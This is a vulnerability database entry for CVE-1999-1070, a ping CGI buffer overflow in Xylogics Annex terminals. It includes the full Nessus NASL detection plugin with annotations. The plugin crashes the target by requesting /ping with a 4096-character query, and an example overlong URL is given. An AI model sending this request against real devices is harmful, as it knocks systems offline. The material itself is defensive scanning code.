Vulnerabilities > CVE-1999-1070 - Unspecified vulnerability in Xylogics Annex

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
xylogics
nessus

Summary

Buffer overflow in ping CGI program in Xylogics Annex terminal service allows remote attackers to cause a denial of service via a long query parameter.

Vulnerable Configurations

Part Description Count
Application
Xylogics
1

Nessus

NASL family: CGI abuses
NASL id: ANNEX_DOS.NASL
description: It was possible to crash the remote Annex terminal by connecting to the HTTP port, and requesting the '/ping' CGI script with an argument that is too long.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 10017
published: 1999-06-22
reporter: This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/10017
title: Xylogics Annex Terminal Service ping CGI Program DoS
code:
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration block: when the scanner loads the plugin with `description`
# set, only the metadata below is declared and the script exits (exit(0) at
# the end of the block) before any traffic is sent to a target.
if (description)
{
 script_id(10017);
 script_version("1.40");
 script_cvs_date("Date: 2018/06/13 18:56:25");

 # Ties any finding from this plugin to the CVE entry for the Annex ping CGI overflow.
 script_cve_id("CVE-1999-1070");

 script_name(english:"Xylogics Annex Terminal Service ping CGI Program DoS");
 script_summary(english:"Crashes an Annex terminal");

 script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a denial of service.");
 # The description text is a runtime string shown in reports; it names the
 # '/ping' CGI and its 'query' argument as the affected input.
 script_set_attribute(attribute:"description", value:
"It was possible to crash the remote Annex terminal by connecting to
the HTTP port, and requesting the '/ping' CGI script with an argument
that is too long. For example:

 http://www.example.com/ping?query=AAAAA(...)AAAAA");
 # NOTE(review): the only remediation offered is removing the CGI; whether
 # that is possible on the appliance is not shown here. Confirm with the
 # vendor, and consider limiting who can reach the device's HTTP port.
 script_set_attribute(attribute:"solution", value:"Remove the '/ping' CGI script from your web server.");
 # NOTE(review): this vector says AC:M and A:C (complete availability loss),
 # while the CVE record this plugin is listed under rates the issue CVSS 5.0
 # with low complexity and partial availability impact. Confirm which rating
 # your reporting should use.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C");

 script_set_attribute(attribute:"vuln_publication_date", value:"1998/07/25");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22");

 # Marks findings as "potential": the result is inferred from the target
 # going unresponsive, not from a version or banner match.
 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 # ACT_KILL_HOST places the plugin in the category of checks that can take
 # the target down, which matches the summary above ("Crashes an Annex
 # terminal"). Scan policies that exclude disruptive checks key off this.
 script_category(ACT_KILL_HOST);
 script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");

 # `script_dependencie` is the NASL built-in's own spelling, not a typo.
 script_dependencie("find_service1.nasl", "http_version.nasl", "no404.nasl");
 # Requires the paranoid-report setting; the run-time section checks
 # report_paranoia again before doing anything.
 script_require_keys("Settings/ParanoidReport");
 script_require_ports("Services/www", 80);
 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Run-time check. It is disruptive by design: a positive result means the
# target stopped responding after the request below.

# Second gate on top of script_require_keys: bail out through the audit
# trail unless the scan is configured with report_paranoia of 2 or more.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_http_port(default:80);
# Skip targets whose web service is already unresponsive, so an existing
# outage is not attributed to this test.
if  (http_is_dead(port: port)) exit(0);

cgi = "/ping";
# Only proceed when the '/ping' CGI is actually present on the target.
if (! is_cgi_installed3(item:cgi, port:port)) exit(0);

# start_denial()/end_denial() bracket the test request; the value returned
# by end_denial() is used below as the host-level liveness result.
# (presumably it reports whether the host still answers; confirm against
# the NASL reference)
start_denial();
# Single GET of /ping?query=<4096 filler characters>. The response `r` is
# never inspected; the verdict comes only from the liveness checks that follow.
r = http_send_recv3(port: port, item: strcat(cgi, "?query=", crap(4096)), method: 'GET');
# The web service must look dead (checked with retry: 3) before the
# host-level result is even consulted.
if (http_is_dead(port: port, retry: 3))
{
 alive = end_denial();
 # NOTE(review): a finding is raised only when both the HTTP service and the
 # host itself appear down. If the web service died but end_denial() reports
 # the host alive, nothing is reported; treat a clean result with that gap
 # in mind.
 if(!alive)
 {
   security_hole(port);
   # Records in the knowledge base that the host is down, which other
   # plugins in the same scan can read.
   set_kb_item(name:"Host/dead", value:TRUE);
 }
}